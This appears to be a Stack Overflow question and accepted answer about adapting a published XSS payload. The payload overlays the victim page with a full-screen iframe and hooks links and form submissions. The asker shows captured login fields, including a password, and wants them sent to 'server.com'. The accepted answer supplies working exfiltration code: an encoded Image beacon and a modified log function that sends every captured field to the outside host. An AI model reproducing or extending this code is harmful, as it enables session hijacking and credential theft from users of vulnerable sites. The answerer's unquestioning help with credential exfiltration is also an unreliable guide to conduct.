# Javascript variable's output is empty when sent via HTTP Request

Tags: javascript, request

I have the following code (NOTE: The code isn't mine, I just want to modify it, here is the source: https://rileykidd.com/2013/06/06/the-xss-who-watched-me/). Here is the code from the website:

```
(function() {
    var d = new Date();
    function log(m){
        var s = d;                                                      
        for(i in m){ s += "\n" + i + ":" + m[i] + " ";  }           
        console.log(s);
    }
    function spoof(k){
        window.history.pushState({}, "", k);                            
    }
    function hook(){
        $('#xss').contents().find('a').bind('click', function() {       
            log({"Event":"Link", "Current":document.URL, "Target":$(this).attr('href')});
            spoof($(this).attr('href'));
        });
        $('#xss').contents().find('form').bind('submit', function() {   
            var l = {"Event":"Form", "Current":document.URL, "Target":$(this).attr('action')};
            $.each($(this).serializeArray(), function(i, f) { l[f.name] = f.value; });
            log(l);
            spoof($(this).attr('action'));
        });
    }
    function poison() {
        if (self == top){                                           
            $('body').children().hide();                        
            log({"Hooked":document.URL});
            $('<iframe id="xss">').attr('src', document.URL).css({
                "position":"fixed", "top":"0px", "left":"0px", "bottom":"0px", "right":"0px", "width":"100%", "height":"100%", "border":"none", "margin":"0", "padding":"0", "overflow":"hidden", "z-index":"999999"
            }).appendTo('body').load(function(){                
                hook();                                             
            });
        }
    }
    function poll() {
        if (typeof(jQuery) !== 'undefined') {
            clearInterval(interval);
            poison();
        }
    }
        if (typeof(jQuery) == 'undefined') {    
                var s = document.createElement('script');
                s.src = ('https:' == document.location.protocol ? 'https://' : 'http://') + 'code.jquery.com/jquery-latest.min.js';
                document.head.appendChild(s);
                var interval = setInterval(poll, 50); 
        } else {
                poison();
        }
})();
```

My goal is to modify this code so that I can send a request to `http://server.com` the following variables: `document.URL` and `$(this).attr('action')`, so I added the following code instead of `log(l)` (line 19):

```
new Image().src = "http://server.com/file.php?data=" + document.URL + $(this).attr('action');
```

The problem is whenever I want to make a HTTP Request including this variable `$(this).attr('action')`, the output of the second variable I get in the server is empty. `document.URL` works just fine, however the second variable is what I am facing problem with. When I test the variable output into the browser it works perfectly (when executing `log(l)`), I get:

```
Current:http://somewebsite.com
Target:/login 
utf8:✓ 
authenticity_token:random
back_url:http://somewebsite.com
username:something@email.com 
password:my_secured_password
```

Now my goal is to send this output into the server.

Answer (score 1, accepted):

You probably need to URI-encode your query params:

```js
new Image().src = (
  'http://server.com/file.php' +
  '?url=' + encodeURIComponent(document.URL) +
  '&action=' + encodeURIComponent($(this).attr('action'))
);
```

If you need to send `log` output to the server, modify your `function log`:

```js
function log(m) {
  var s = d;
  for (i in m) {
    s += "\n" + i + ":" + m[i] + " ";
  }
  console.log(s);
  new Image().src = 'http://server.com/file.php?data=' + encodeURIComponent(s);
}
```

Comment: The encoding URI is only giving me the first line of the output. Note that the output contains newlines. Is any possible way to get all the output with newlines?

Comment: @KleitonKurti, as per your question: `My goal is to modify this code so that I can send a request to http://server.com the following variables: document.URL and $(this).attr('action')`. My answer does exactly that. If you want to send what `log` prints, you need to update your request accordingly.